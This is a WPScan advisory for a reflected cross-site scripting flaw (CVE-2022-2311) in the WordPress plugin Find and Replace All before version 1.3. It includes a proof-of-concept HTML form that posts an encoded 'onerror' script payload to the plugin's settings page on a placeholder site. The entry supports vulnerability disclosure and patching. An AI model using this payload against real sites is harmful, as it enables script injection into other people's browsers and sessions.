WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

Find and Replace All < 1.3 - Reflected Cross Site Scripting

Description

The plugin does not sanitize and escape some parameters from its setting page before outputting them back to the user, leading to a Reflected Cross-Site Scripting issue.

Proof of Concept

<html>
<body>
<form action="http://vulnerable-site.tld/wp-admin/admin.php?page=frasettings" method="POST">
<input type="hidden" name="findstr" value="Doing&#32;XSS&#32;Test&#32;here" />
<input type="hidden" name="replacestr" value="tested&quot;&#47;&gt;&lt;img&#32;src&#61;x&#32;onerror&#61;alert(document.domain);//">
<input type="hidden" name="submit" value="Replace&#32;Now" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

Affects Plugins

find-and-replace-all
Fixed in version 1.3 - plugin closed

References

CVE
CVE-2022-2311

Classification

Type

XSS

OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79

Miscellaneous

Original Researcher

Vinay Varma Mudunuri, Krishna Harsha Kondaveeti

Submitter

Vinay Varma Mudunuri

Verified

Yes

WPVDB ID
287a14dc-d1fc-481d-84af-7eb172dc68c9

Timeline

Publicly Published

2022-11-03 (about 4 months ago)

Added

2022-11-03 (about 4 months ago)

Last Updated

2022-11-03 (about 4 months ago)

Our Other Services

WPScan WordPress Security Plugin